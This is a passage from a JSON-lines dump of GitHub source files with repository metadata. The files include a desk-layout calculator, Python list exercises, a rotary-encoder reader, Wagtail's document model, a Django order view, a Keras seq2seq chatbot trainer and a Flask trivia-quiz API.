data\n params = import_params()\n\n","repo_name":"meluso/cesium-framework","sub_path":"model/data_import.py","file_name":"data_import.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"35326406105","text":"from math import sqrt, pow\n\n\"\"\"TODAS AS MEDIDAS ESTÃO EM cm!!!\"\"\"\n\n\nclass Carteira:\n def __init__(self, raio, x, y):\n self.raio = raio\n self.x = x\n self.y = y\n\n def distancia_carteira(self, pontox, pontoy):\n \"\"\"Essa função é para fazer a distância entre o (x, y) da carteira e os (x, y) das outras carteiras,\n que serão adicionadas conforme o programa roda.\"\"\"\n if sqrt(((pontox - self.x) ** 2) + ((pontoy - self.y) ** 2)) >= (self.raio * 2):\n return True\n else:\n return False\n\n def distancia_paredex(self, altura):\n \"\"\"Essa função é para calcular a distancia entre a parede do eixo X com relação à carteira\"\"\"\n if abs(self.x - altura) >= self.raio:\n return True\n else:\n return False\n\n def distancia_paredey(self, largura):\n \"\"\"Essa função é para calcular a distancia entre a parede do eixo Y com relação à carteira\"\"\"\n if abs(self.y - largura) >= self.raio:\n return True\n else:\n return False\n\n def distancia_total(self, alturatot, larguratot, lista):\n \"\"\"Essa função é para calcular as distancias totais\"\"\"\n if self.distancia_paredex(alturatot):\n if self.distancia_paredey(larguratot):\n if len(lista) != 0:\n for c in lista:\n if self.distancia_carteira(c[0], c[1]):\n return True\n else:\n return True\n else:\n return False\n else:\n return False\n\n\ncarteiras_colocadas = [] # Lista das carteiras\n\nlarg = int(input('Digite a LARGURA da sala (em cm): ')) # Largura da sala\naltu = int(input('Digite a ALTURA da sala (em cm): ')) # Altura da sala\n\ntablado = int(input('Digite o TAMANHO do tablado (em cm): ')) # Tamanho do tablado\naltunova = altu - tablado\n\nraio_carteira = int(input('Digite a DISTÂNCIA entre as carteiras (em cm): ')) # Distancias entre carteira\nraio_carteira /= 2\nesp = int(input('Digite o ESPAÇAMENTO: ')) # Espaçamento (APENAS PARA CÁLCULOS)\n\nfor j in range(0, altunova + esp, esp): # Loop de cada ponto do plano cartesiano\n for i in range(0, larg + esp, esp):\n cart = Carteira(raio_carteira, i, j)\n if cart.distancia_total(altunova, larg, carteiras_colocadas):\n tupla = (i, j)\n carteiras_colocadas.append(tupla)\n else:\n pass\n\nfor indice, ca in enumerate(carteiras_colocadas):\n print(f'Carteira {indice} = {ca}')\n","repo_name":"BerDavoglio/projeto_camaleao","sub_path":"ProjetoCAMALEAO_PyCharm/CAMALEAO_1.py","file_name":"CAMALEAO_1.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20052731231","text":"# # ipAddress = input(\"Please enter your ip address: \")\n# # print(ipAddress.count(\".\"))\n#\n# parrot_list = [\"man_panin\", \"nore more\", \"a stiff\", \"bereft of live\"]\n#\n# for state in parrot_list:\n# print(\"This parrot is \" + state)\n#\n# even = [2, 4, 6, 8]\n# odd = [1, 3, 5, 7, 9]\n#\n# numbers = even + odd\n# print(numbers)\n# #the idea behind sort method or function is the idea behind the sort method\n# #works on the object and doesnot actually create a new object\n# #the method sort actually mutates the objects\n# #numbers.sort()\n# print(numbers)\n# #the method sorted actually returns the new object\n#\n# numbersInOrder = sorted(numbers)\n# if numbers == numbersInOrder:\n# print(\"The lists 
are equal\")\n# else:\n# print(\"The lists are not equal\")\n#\n# if numbersInOrder == sorted(numbers):\n# print(\"The lists are equal\")\n# else:\n# print(\"The lists are not equal\")\n#\n\nlist_1 = []\nlist_2 = list()\n\nprint(\"List 1 : {}\".format(list_1))\nprint(\"List 2 is {}\".format(list_2))\n\nif list_1 == list_2:\n print(\"The lists are equal\")\n\n\n#All list types in python are iterable\n\nprint(list(\"The lists are equal\"))\n#Nice\neven = [2, 4, 6, 8]\nanother_even = even\nanother_even.sort(reverse=True)\nif even == another_even:\n print(even)\n#both even and another_even refers to the same list and this can actually be confussing\n\nanother_even2=list(even)\nanother_even2.sort()\nif even==another_even2:\n print(\"The lists are equal\")\nelse:\n print(\"The lists are not equal\")\n\nodd = [1, 3, 5, 7, 9]\nnumbers = [even, odd]\n\nfor number_set in numbers:\n print(number_set)\n\n for value in number_set:\n print(value)","repo_name":"MishRanu/udemy-python-masterclass","sub_path":"lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"75251464631","text":"import sys\nif sys.platform == 'esp8266' or sys.platform == 'esp32':\n from rotary_irq_esp import RotaryIRQ\nelif sys.platform == 'pyboard':\n from rotary_irq_pyb import RotaryIRQ\nelif sys.platform == 'rp2':\n from rotary_irq_rp2 import RotaryIRQ\nelse:\n print('Warning: The Rotary module has not been tested on this platform')\n\nimport time\n\nencoder_pin_dict = [(28,29),(27,26),(6,7),(22,20),(4,5),(9,8)]\n\nrotary_list = []\nfor x in range(len(encoder_pin_dict)):\n rotary_list.append( \n RotaryIRQ(pin_num_clk=encoder_pin_dict[x][0],\n pin_num_dt=encoder_pin_dict[x][1],\n min_val=0,\n max_val=24,\n reverse=False,\n range_mode=RotaryIRQ.RANGE_UNBOUNDED,\n pull_up=True,\n half_step=True)\n )\nlast_value = [0 for x in range(6)]\n\nwhile True:\n for x in range(6):\n current_val = rotary_list[x].value()\n if current_val > last_value[x]:\n print(x,0)\n elif current_val < last_value[x]:\n print(x,1)\n last_value[x] = current_val\n","repo_name":"hlord2000/RotaryEncoderHorror","sub_path":"Firmware/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26376803001","text":"import os.path\nimport urllib\nfrom contextlib import contextmanager\nfrom mimetypes import guess_type\n\nfrom django.conf import settings\nfrom django.core.validators import FileExtensionValidator\nfrom django.db import models\nfrom django.dispatch import Signal\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\nfrom taggit.managers import TaggableManager\n\nfrom wagtail.models import CollectionMember, ReferenceIndex\nfrom wagtail.search import index\nfrom wagtail.search.queryset import SearchableQuerySetMixin\nfrom wagtail.utils.file import hash_filelike\n\n\nclass DocumentQuerySet(SearchableQuerySetMixin, models.QuerySet):\n pass\n\n\nclass AbstractDocument(CollectionMember, index.Indexed, models.Model):\n title = models.CharField(max_length=255, verbose_name=_(\"title\"))\n file = models.FileField(upload_to=\"documents\", verbose_name=_(\"file\"))\n created_at = models.DateTimeField(verbose_name=_(\"created at\"), auto_now_add=True)\n uploaded_by_user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n verbose_name=_(\"uploaded by user\"),\n null=True,\n blank=True,\n 
editable=False,\n on_delete=models.SET_NULL,\n )\n uploaded_by_user.wagtail_reference_index_ignore = True\n\n tags = TaggableManager(help_text=None, blank=True, verbose_name=_(\"tags\"))\n\n file_size = models.PositiveIntegerField(null=True, editable=False)\n # A SHA-1 hash of the file contents\n file_hash = models.CharField(max_length=40, blank=True, editable=False)\n\n objects = DocumentQuerySet.as_manager()\n\n search_fields = CollectionMember.search_fields + [\n index.SearchField(\"title\", boost=10),\n index.AutocompleteField(\"title\"),\n index.FilterField(\"title\"),\n index.RelatedFields(\n \"tags\",\n [\n index.SearchField(\"name\", boost=10),\n index.AutocompleteField(\"name\"),\n ],\n ),\n index.FilterField(\"uploaded_by_user\"),\n ]\n\n def clean(self):\n \"\"\"\n Checks for WAGTAILDOCS_EXTENSIONS and validates the uploaded file\n based on allowed extensions that were specified.\n Warning : This doesn't always ensure that the uploaded file is valid\n as files can be renamed to have an extension no matter what\n data they contain.\n\n More info : https://docs.djangoproject.com/en/3.1/ref/validators/#fileextensionvalidator\n \"\"\"\n allowed_extensions = getattr(settings, \"WAGTAILDOCS_EXTENSIONS\", None)\n if allowed_extensions:\n validate = FileExtensionValidator(allowed_extensions)\n validate(self.file)\n\n def is_stored_locally(self):\n \"\"\"\n Returns True if the image is hosted on the local filesystem\n \"\"\"\n try:\n self.file.path\n\n return True\n except NotImplementedError:\n return False\n\n @contextmanager\n def open_file(self):\n # Open file if it is closed\n close_file = False\n f = self.file\n\n if f.closed:\n # Reopen the file\n if self.is_stored_locally():\n f.open(\"rb\")\n else:\n # Some external storage backends don't allow reopening\n # the file. Get a fresh file instance. 
#1397\n storage = self._meta.get_field(\"file\").storage\n f = storage.open(f.name, \"rb\")\n\n close_file = True\n\n # Seek to beginning\n f.seek(0)\n\n try:\n yield f\n finally:\n if close_file:\n f.close()\n\n def get_file_size(self):\n if self.file_size is None:\n try:\n self.file_size = self.file.size\n except Exception: # noqa: BLE001\n # File doesn't exist\n return\n\n self.save(update_fields=[\"file_size\"])\n\n return self.file_size\n\n def _set_file_hash(self):\n with self.open_file() as f:\n self.file_hash = hash_filelike(f)\n\n def get_file_hash(self):\n if self.file_hash == \"\":\n self._set_file_hash()\n self.save(update_fields=[\"file_hash\"])\n\n return self.file_hash\n\n def _set_document_file_metadata(self):\n self.file.open()\n\n # Set new document file size\n self.file_size = self.file.size\n\n # Set new document file hash\n self._set_file_hash()\n self.file.seek(0)\n\n def __str__(self):\n return self.title\n\n @property\n def filename(self):\n return os.path.basename(self.file.name)\n\n @property\n def file_extension(self):\n return os.path.splitext(self.filename)[1][1:]\n\n @property\n def url(self):\n if getattr(settings, \"WAGTAILDOCS_SERVE_METHOD\", None) == \"direct\":\n try:\n return self.file.url\n except NotImplementedError:\n # backend does not provide a url, so fall back on the serve view\n pass\n\n return reverse(\"wagtaildocs_serve\", args=[self.id, self.filename])\n\n def get_usage(self):\n return ReferenceIndex.get_grouped_references_to(self)\n\n @property\n def usage_url(self):\n return reverse(\"wagtaildocs:document_usage\", args=(self.id,))\n\n def is_editable_by_user(self, user):\n from wagtail.documents.permissions import permission_policy\n\n return permission_policy.user_has_permission_for_instance(user, \"change\", self)\n\n @property\n def content_type(self):\n content_types_lookup = getattr(settings, \"WAGTAILDOCS_CONTENT_TYPES\", {})\n return (\n content_types_lookup.get(self.file_extension.lower())\n or guess_type(self.filename)[0]\n or \"application/octet-stream\"\n )\n\n @property\n def content_disposition(self):\n inline_content_types = getattr(\n settings, \"WAGTAILDOCS_INLINE_CONTENT_TYPES\", [\"application/pdf\"]\n )\n if self.content_type in inline_content_types:\n return \"inline\"\n else:\n return \"attachment; filename={0}; filename*=UTF-8''{0}\".format(\n urllib.parse.quote(self.filename)\n )\n\n class Meta:\n abstract = True\n verbose_name = _(\"document\")\n verbose_name_plural = _(\"documents\")\n\n\nclass Document(AbstractDocument):\n admin_form_fields = (\"title\", \"file\", \"collection\", \"tags\")\n\n class Meta(AbstractDocument.Meta):\n permissions = [\n (\"choose_document\", \"Can choose document\"),\n ]\n\n\n# provides args: request\ndocument_served = Signal()\n\n\nclass UploadedDocument(models.Model):\n \"\"\"\n Temporary storage for documents uploaded through the multiple doc uploader, when validation\n rules (e.g. required metadata fields) prevent creating a Document object from the document file\n alone. 
In this case, the document file is stored against this model, to be turned into a\n Document object once the full form has been filled in.\n \"\"\"\n\n file = models.FileField(upload_to=\"uploaded_documents\", max_length=200)\n uploaded_by_user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n verbose_name=_(\"uploaded by user\"),\n null=True,\n blank=True,\n editable=False,\n on_delete=models.SET_NULL,\n )\n uploaded_by_user.wagtail_reference_index_ignore = True\n","repo_name":"wagtail/wagtail","sub_path":"wagtail/documents/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7346,"program_lang":"python","lang":"en","doc_type":"code","stars":16307,"dataset":"github-code","pt":"95"} +{"seq_id":"72205238393","text":"import re\nfrom datetime import datetime\nimport datetime as dtm\n\n\ndef verificar_usuario(nombre):\n leng = len(nombre) #numero_de_caracteres\n tipo_dato = isinstance(nombre,str)\n is_number = re.search(\"[0-9]\",nombre)\n arroba = False\n if leng > 6:\n arroba = nombre[6] == \"@\"\n first_last = nombre[0] != nombre[-1]\n k = 0\n exist_plus = False\n signo = 0\n\n for i in range(leng):\n caracter = nombre[i]\n if caracter == \"k\":\n k += 1\n if caracter == '+':\n exist_plus = True\n if caracter == '?' or caracter == '=' or caracter == '&':\n signo += 1\n\n if leng == 10 and tipo_dato and arroba and first_last and k <= 3 and exist_plus and signo > 0 and not is_number :\n return True\n else:\n return False\n\n\ndef validate_date(d,m,a):\n today = datetime.today()\n nacimiento = dtm.datetime(a, m, d).strftime('%s')\n unix_act = dtm.datetime(today.year, today.month, today.day).strftime('%s')\n edad = int((int(unix_act) - int(nacimiento))/31556926)\n return edad\n\ndef validate_alias(al):\n long = len(al)\n space = re.search(' ', al)\n if not space and long >= 5:\n return True\n else:\n return False\n\n\n","repo_name":"DavidGarrido/retos","sub_path":"reto_tres/modulos.py","file_name":"modulos.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"9093004117","text":"from django.views import View\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom ...Entities.Product.Customization import Customization\nfrom django import forms\nfrom django.forms.widgets import TextInput\nimport uuid\nfrom ...Entities.Product.Product import Product\nfrom ...Entities.Orders.Order import Order\nfrom ...Entities.Orders.Status import Status\nfrom django.contrib.auth.models import AnonymousUser\nfrom ...Entities.Users.Address import Address\nfrom ...Entities.Dictionary.Address.City import City\nfrom ...Entities.Users.OrderList import OrderList\nfrom ...Entities.Orders.ProductList import ProductList\nfrom django.http import HttpResponse\nfrom .OrderForm import OrderForm\n\nclass CustomizationForm(forms.ModelForm):\n \n class Meta:\n model = Customization\n fields = ['color','topMaterial','bodyMaterial','pickups']\n widgets = {\n 'color':TextInput(attrs={'class':'form-control'}),\n }\n \nclass CustomizationView(View):\n def get(self, request, **kwargs):\n form=CustomizationForm()\n uid = kwargs['pk']\n \n if isinstance(request.user,AnonymousUser)==False:\n user=request.user\n \n address=user.address\n \n if address:\n street=str(address.street)\n zip_code=str(address.zipCode)\n number=str(address.number)\n flatNumber=str(address.flatNumber)\n else:\n street=\"\"\n zip_code=\"\"\n flatNumber=\"\"\n number=\"\"\n intaial_data = {\n 
'email':str(user.email), \n 'first_name':str(user.first_name), \n 'last_name':str(user.last_name),\n 'street':street,\n 'zipcode':zip_code,\n 'number':number,\n 'flat_number':flatNumber\n }\n ordeForm=OrderForm(initial=intaial_data)\n else:\n ordeForm=OrderForm()\n\n try:\n product=Product.objects.get(id=uid)\n except Product.DoesNotExist:\n product=None\n \n try:\n cities = City.objects.all()\n except City.DoesNotExist:\n cities=[]\n \n return render(request,\"store/Custumization.html\",{\"Form\":form,\"product\":product,\"cities\":cities,'orderForm':ordeForm,})\n \n def post(self, request, **kwargs):\n uid = kwargs['pk']\n ordeForm=OrderForm(request.POST)\n try:\n product=Product.objects.get(id=uid)\n except Product.DoesNotExist:\n product=None\n if 'addToCart' in request.POST:\n form=CustomizationForm(request.POST)\n if form.is_valid():\n p=form.save()\n w=product\n w.pk=None\n w.customization=p\n w.save()\n return HttpResponseRedirect(w.add_To_Cart()) \n else:\n print(form.errors)\n \n if \"placeOrder\" in request.POST:\n if ordeForm.is_valid():\n form=CustomizationForm(request.POST)\n print(request.POST)\n p=Customization.objects.create(color=request.POST['color'],topMaterial_id=request.POST['topMaterial'],bodyMaterial_id=request.POST['bodyMaterial'],pickups=request.POST['pickups'])\n w=product\n w.pk=None\n w.customization=p\n w.save()\n clenData=ordeForm.cleaned_data\n cityID=request.POST['city']\n try:\n city=City.objects.get(id=cityID)\n except City.DoesNotExist:\n return HttpResponse(\"error\")\n print(\"placeOrder\") \n try:\n status=Status.objects.get(id=1)\n except Status.DoesNotExist:\n return HttpResponse(\"error\")\n addres=Address.objects.create(street=clenData['street'],number=clenData['number'],\n zipCode=clenData['zipcode'],\n flatNumber=clenData['flat_number'],\n city=city)\n \n order=Order.objects.create(name=clenData['first_name'],lastName=clenData['last_name'],email=clenData['email'],phoneNumber=request.POST['phone']\n ,price=product.price,addres=addres,status=status)\n print(request.POST)\n \n \n ProductList.objects.create(order=order,product=w,qunatitii=1) \n \n print('problem1') \n if isinstance(request.user,AnonymousUser)==False:\n OrderList.objects.create(order=order,user=request.user)\n \n return render(request,\"store/Order.html\")","repo_name":"CezaryKretkowski/CanncionesSite","sub_path":"CancionesSite/app/Views/Products/Customization.py","file_name":"Customization.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41776415422","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\nimport yaml\n\nimport numpy as np\nfrom tensorflow.keras.layers import Input, Embedding, LSTM, Dense\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras import preprocessing, utils\nfrom tensorflow.keras.utils import plot_model\n\n\ndef tokenize(sentences):\n tokens_list = []\n vocabulary = []\n for sentence in sentences:\n sentence = sentence.lower()\n sentence = re.sub('[^a-zA-Z]', ' ', sentence)\n tokens = sentence.split()\n vocabulary += tokens\n tokens_list.append(tokens)\n return tokens_list, vocabulary\n\n\n\"\"\" Load QA data \"\"\"\ndir_path = 'data'\nfiles_list = os.listdir(dir_path + os.sep)\n\nquestions = list()\nanswers = list()\nfor filepath in files_list:\n stream = open(dir_path + os.sep + filepath, 'rb')\n docs = yaml.safe_load(stream)\n conversations = docs['conversations']\n for con in conversations:\n if len(con) > 2 :\n 
questions.append(con[0])\n            replies = con[1: ]\n            ans = ''\n            for rep in replies:\n                ans += ' ' + rep\n            answers.append(ans)\n        elif len(con) > 1:\n            questions.append(con[0])\n            answers.append(con[1])\n\n# keep questions and answers aligned: popping from questions while indexing answers skews the two lists\nanswers_with_tags = list()\nfiltered_questions = list()\nfor i in range(len(answers)):\n    if type(answers[i]) == str:\n        answers_with_tags.append(answers[i])\n        filtered_questions.append(questions[i])\nquestions = filtered_questions\n\n# wrap each answer with start/end markers for the decoder (the angle-bracket tokens were stripped in this copy)\nanswers = list()\nfor i in range(len(answers_with_tags)):\n    answers.append('<START> ' + answers_with_tags[i] + ' <END>')\n\ntokenizer = preprocessing.text.Tokenizer()\ntokenizer.fit_on_texts(questions + answers)\nVOCAB_SIZE = len(tokenizer.word_index) + 1\n#print( 'VOCAB SIZE : {}'.format( VOCAB_SIZE ))\n\n\n\"\"\" Preparing data for Seq2Seq model \"\"\"\nvocab = []\nfor word in tokenizer.word_index:\n    vocab.append(word)\n\n\n\"\"\" encoder_input_data \"\"\"\ntokenized_questions = tokenizer.texts_to_sequences(questions)\nmaxlen_questions = max([ len(x) for x in tokenized_questions])\npadded_questions = preprocessing.sequence.pad_sequences(tokenized_questions, maxlen=maxlen_questions, padding='post')\nencoder_input_data = np.array(padded_questions)\nprint(encoder_input_data.shape, maxlen_questions)\n\n\"\"\" decoder_input_data \"\"\"\ntokenized_answers = tokenizer.texts_to_sequences(answers)\nmaxlen_answers = max([len(x) for x in tokenized_answers])\npadded_answers = preprocessing.sequence.pad_sequences(tokenized_answers, maxlen=maxlen_answers, padding='post' )\ndecoder_input_data = np.array(padded_answers)\nprint(decoder_input_data.shape, maxlen_answers)\n\n\"\"\" decoder_output_data \"\"\"\ntokenized_answers = tokenizer.texts_to_sequences(answers)\nfor i in range(len(tokenized_answers)) :\n    tokenized_answers[i] = tokenized_answers[i][1:]\npadded_answers = preprocessing.sequence.pad_sequences(tokenized_answers, maxlen=maxlen_answers, padding='post')\nonehot_answers = utils.to_categorical(padded_answers, VOCAB_SIZE)\ndecoder_output_data = np.array(onehot_answers)\nprint(decoder_output_data.shape)\n\n\"\"\" Defining the Encoder-Decoder model \"\"\"\nencoder_inputs = Input(shape=(maxlen_questions, ))\nencoder_embedding = Embedding(VOCAB_SIZE,200 ,mask_zero=True)(encoder_inputs)\nencoder_outputs, state_h, state_c = LSTM(200 ,return_state=True)(encoder_embedding)\nencoder_states = [state_h, state_c]\n\ndecoder_inputs = Input(shape=(maxlen_answers, ))\ndecoder_embedding = Embedding(VOCAB_SIZE, 200, mask_zero=True)(decoder_inputs)\ndecoder_lstm = LSTM(200, return_state=True, return_sequences=True)\ndecoder_outputs , _, _ = decoder_lstm(decoder_embedding, initial_state=encoder_states)\ndecoder_dense = Dense(VOCAB_SIZE, activation='softmax') \noutput = decoder_dense(decoder_outputs)\n\nmodel = Model([encoder_inputs, decoder_inputs], output)\nmodel.compile(optimizer='adam', loss='categorical_crossentropy')\n\nmodel.summary()\nplot_model(model, to_file='model.png', show_shapes=True)\n\n\n\"\"\" Train and save the model \"\"\"\nmodel.fit([encoder_input_data, decoder_input_data], decoder_output_data, batch_size=50, epochs=500) \nmodel.save('model.h5')\n","repo_name":"joannhsiao/ChatBot","sub_path":"chatbot_seq2seq_lstm.py","file_name":"chatbot_seq2seq_lstm.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
{"seq_id":"70050897274","text":"#!/usr/bin/env python\nfrom peyotl.collections_store import get_empty_collection\nfrom peyotl.collections_store.validation import validate_collection\nfrom peyotl import write_as_json\nimport sys\n\n# Expecting a lot of lines like 
pg_2359_4962 for 'pg_2359', 'tree4962'\ninp_fn = sys.argv[1]\nwith open(inp_fn, 'rU') as inp:\n lines = []\n for line in inp:\n line = line.strip()\n if (not line) or (line == 'taxonomy'):\n continue\n assert line.endswith('.tre')\n frag = line[:-4]\n s = frag.split('_')\n study_id, tree_frag = '_'.join(s[:-1]), s[-1]\n tree_id = 'tree' + tree_frag\n lines.append((study_id, tree_id))\nc = get_empty_collection()\nd = c['decisions']\nfor pair in lines:\n d.append({'SHA': '',\n 'decision': 'INCLUDED',\n 'name': '',\n 'studyID': pair[0],\n 'treeID': pair[1]\n })\n\nassert not (validate_collection(c)[0])\nwrite_as_json(c, sys.stdout)\n","repo_name":"OpenTreeOfLife/peyotl","sub_path":"extras/tree-list-to-collection.py","file_name":"tree-list-to-collection.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"3308347487","text":"import os\nfrom sqlalchemy.sql.expression import func\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nimport random\n\nfrom models import setup_db, Question, Category\n\nQUESTIONS_PER_PAGE = 10\nrequired_attribute_template = \"A value is required for the attribute \\\"{}\\\".\"\ninteger_expected_template = \"The attribute \\\"{}\\\" must be an integer.\"\ninteger_out_of_range_template = (\n \"The attribute \\\"{}\\\" must be an integer from {} and {}.\")\nlist_expected_template = \"The attribute \\\"{}\\\" must be a list.\"\nobject_expected_template = \"The attribute \\\"{}\\\" must be an object\"\nnot_found_template = (\n \"A resource for the attribute \\\"{}\\\" with the value \\\"{}\\\" was not found.\")\n\n\ndef create_app(test_config=None):\n app = Flask(__name__)\n setup_db(app)\n CORS(app)\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET,PATCH,POST,DELETE,OPTIONS')\n return response\n\n @app.route('/categories')\n def retrieve_categories():\n categories = Category.query.all()\n formatted_categories = {\n category.id: category.type\n for category in categories\n }\n\n return jsonify({\n \"success\": True,\n \"categories\": formatted_categories\n })\n\n @app.route('/questions')\n def retrieve_questions():\n page = request.args.get('page', 1, type=int)\n questions_page = Question.query.\\\n order_by(Question.id.asc()).\\\n paginate(page, per_page=QUESTIONS_PER_PAGE)\n total_questions = questions_page.total\n\n formatted_questions = [\n question.format()\n for question in questions_page.items]\n\n current_category = None\n categories = {\n category.id: category.type.lower()\n for category in Category.query.all()}\n\n return jsonify({\n \"success\": True,\n \"questions\": formatted_questions,\n \"total_questions\": total_questions,\n \"categories\": categories,\n \"current_category\": current_category\n })\n\n @app.route('/questions/', methods=['DELETE'])\n def delete_question(question_id):\n question = Question.query.\\\n filter(Question.id == question_id).\\\n one_or_none()\n\n if question is None:\n abort(422)\n\n question.delete()\n return jsonify({\n \"success\": True\n })\n\n def validate_create_question_input(data):\n errors = []\n if \"question\" not in data:\n errors.append({\n \"type\": \"attribute_required\",\n \"attribute\": \"question\",\n \"message\": required_attribute_template.format(\"question\")\n })\n\n if \"answer\" not in 
data:\n errors.append({\n \"type\": \"attribute_required\",\n \"attribute\": \"answer\",\n \"message\": required_attribute_template.format(\"answer\")\n })\n\n if \"category\" not in data:\n errors.append({\n \"type\": \"attribute_required\",\n \"attribute\": \"category\",\n \"message\": required_attribute_template.format(\"category\")\n })\n elif not is_integer(data[\"category\"]):\n errors.append({\n \"type\": \"invalid_type\",\n \"attribute\": \"category\",\n \"message\": integer_expected_template.format(\"category\")\n })\n\n if \"difficulty\" not in data:\n errors.append({\n \"type\": \"attribute_required\",\n \"attribute\": \"difficulty\",\n \"message\": required_attribute_template.format(\"difficulty\")\n })\n elif not is_integer(data[\"difficulty\"]):\n errors.append({\n \"type\": \"invalid_type\",\n \"attribute\": \"difficulty\",\n \"message\": integer_expected_template.format(\"difficulty\")\n })\n elif int(data[\"difficulty\"]) < 1 or int(data[\"difficulty\"]) > 5:\n errors.append({\n \"type\": \"number_out_of_range\",\n \"attribute\": \"difficulty\",\n \"message\": (\n integer_out_of_range_template.format(\"difficulty\", 1, 5))\n })\n\n return errors\n\n @app.route(\"/questions\", methods=[\"POST\"])\n def create_question():\n data = request.get_json()\n\n if not data:\n abort(400)\n\n if \"searchTerm\" in data:\n search_term = data.get(\"searchTerm\", \"\")\n questions = Question.query.\\\n filter(\n Question.question.ilike(f\"%{search_term}%\")\n ).\\\n order_by(Question.id.asc()).\\\n all()\n\n formatted_questions = [\n question.format()\n for question in questions\n ]\n\n return jsonify({\n \"success\": True,\n \"questions\": formatted_questions,\n \"total_questions\": len(formatted_questions),\n \"current_category\": None\n })\n else:\n validation_errors = validate_create_question_input(data)\n if validation_errors:\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": (\n \"The request could not be processed because\"\n \" of invalid data.\"),\n \"validation_errors\": validation_errors\n }), 400\n\n category_id = data.get(\"category\")\n category = Category.query.\\\n filter(Category.id == category_id).\\\n one_or_none()\n if not category:\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": (\n \"The request could not be processed because\"\n \" of invalid data.\"),\n \"validation_errors\": [\n {\n \"attribute\": \"category\",\n \"type\": \"not_found\",\n \"message\": (\n not_found_template.format(\n \"category\",\n category_id))\n }\n ]\n }), 400\n\n question = Question(\n question=data.get(\"question\"),\n answer=data.get(\"answer\"),\n category=data.get(\"category\"),\n difficulty=data.get(\"difficulty\")\n )\n question.insert()\n\n return jsonify({\n \"success\": True\n })\n\n @app.route('/categories//questions')\n def search_by_category(category_id):\n category = Category.query.\\\n filter(\n Category.id == category_id\n ).\\\n one_or_none()\n\n if category is None:\n abort(404)\n\n questions = Question.query.\\\n filter(Question.category == category_id).\\\n order_by(Question.id.asc()).\\\n all()\n\n formatted_questions = [\n question.format()\n for question in questions\n ]\n\n return jsonify({\n \"questions\": formatted_questions,\n \"total_questions\": len(formatted_questions),\n \"current_category\": category_id\n })\n\n def validate_send_quiz_input(data):\n previous_questions = data.get(\"previous_questions\", [])\n quiz_category = data.get(\"quiz_category\")\n\n 
validation_errors = []\n if \"quiz_category\" not in data:\n validation_errors.append({\n \"type\": \"attribute_expected\",\n \"attribute\": \"quiz_category\",\n \"message\": required_attribute_template.format(\"quiz_category\")\n })\n elif type(quiz_category) is not dict:\n validation_errors.append({\n \"type\": \"invalid_type\",\n \"attribute\": \"quiz_category\",\n \"message\": object_expected_template.format(\"quiz_category\")\n })\n elif \"id\" not in data[\"quiz_category\"]:\n validation_errors.append({\n \"type\": \"attribute_expected\",\n \"attribute\": \"quiz_category.id\",\n \"message\": (\n required_attribute_template.format(\"quiz_category.id\"))\n })\n\n if \"previous_questions\" not in data:\n validation_errors.append({\n \"type\": \"attribute_expected\",\n \"attribute\": \"previous_questions\",\n \"message\": (\n required_attribute_template.format(\"previous_questions\"))\n })\n elif type(previous_questions) is not list:\n validation_errors.append({\n \"type\": \"invalid_type\",\n \"attribute\": \"previous_questions\",\n \"message\": list_expected_template.format(\"previous_questions\")\n })\n\n return validation_errors\n\n @app.route(\"/quizzes\", methods=[\"POST\"])\n def send_quiz():\n data = request.get_json()\n if not data:\n abort(400)\n\n validation_errors = validate_send_quiz_input(data)\n if validation_errors:\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": (\n \"The request could not be processed because\"\n \" of invalid data.\"),\n \"validation_errors\": validation_errors\n }), 400\n\n previous_questions = data[\"previous_questions\"]\n category_id = data[\"quiz_category\"][\"id\"]\n category_query = Category.query.filter(Category.id == category_id)\n if category_id != 0 and category_query.one_or_none() is None:\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": (\n \"The request could not be processed because\"\n \" of invalid data.\"),\n \"validation_errors\": [{\n \"type\": \"not_found\",\n \"attribute\": \"quiz_category.id\",\n \"message\": (\n not_found_template.format(\n \"quiz_category.id\",\n category_id))\n }]\n }), 400\n\n question_category_condition = True\n if category_id != 0:\n question_category_condition = Question.category == category_id\n\n question = Question.query.\\\n filter(\n ~Question.id.in_(previous_questions),\n question_category_condition\n ).\\\n order_by(func.random()).\\\n first()\n\n return jsonify({\n \"success\": True,\n \"question\": question.format() if question else None\n })\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": error.description\n }), 400\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n \"success\": False,\n \"type\": 